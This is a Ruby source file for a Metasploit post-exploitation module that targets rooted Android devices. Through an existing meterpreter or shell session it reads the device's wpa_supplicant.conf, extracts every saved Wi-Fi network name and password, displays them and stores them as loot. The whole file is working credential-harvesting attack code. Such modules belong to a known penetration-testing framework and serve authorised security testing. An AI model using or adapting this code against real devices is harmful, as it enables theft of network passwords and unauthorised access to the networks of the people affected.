modules/post/android/gather/wireless_ap.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Android::Priv
def initialize(info = {})
super(
update_info(
info,
{
'Name' => 'Displays wireless SSIDs and PSKs',
'Description' => %q{
This module displays all wireless AP creds saved on the target device.
},
'License' => MSF_LICENSE,
'Author' => ['Auxilus', 'timwr'],
'SessionTypes' => [ 'meterpreter', 'shell' ],
'Platform' => 'android'
}
)
)
end
def run
unless is_root?
print_error('This module requires root permissions.')
return
end
data = read_file('/data/misc/wifi/wpa_supplicant.conf')
aps = parse_wpa_supplicant(data)
if aps.empty?
print_error('No wireless APs found on the device')
return
end
ap_tbl = Rex::Text::Table.new(
'Header' => 'Wireless APs',
'Indent' => 1,
'Columns' => ['SSID', 'net_type', 'password']
)
aps.each do |ap|
ap_tbl << [
ap[0], # SSID
ap[1], # TYPE
ap[2] # PASSWORD
]
end
print_line(ap_tbl.to_s)
p = store_loot(
'wireless.ap.creds',
'text/csv',
session,
ap_tbl.to_csv,
File.basename('wireless_ap_credentials.txt')
)
print_good("Secrets stored in: #{p}")
end
def parse_wpa_supplicant(data)
aps = []
networks = data.scan(/^network={$(.*?)^}$/m)
networks.each do |block|
aps << parse_network_block(block[0])
end
aps
end
def parse_network_block(block)
ssid = parse_option(block, 'ssid')
type = parse_option(block, 'key_mgmt', false)
psk = parse_option(block, 'psk')
[ssid, type, psk]
end
def parse_option(block, token, strip_quotes = true)
if strip_quotes && ((result = block.match(/^\s#{token}="(.+)"$/)))
return result.captures[0]
elsif (result = block.match(/^\s#{token}=(.+)$/))
return result.captures[0]
end
end
end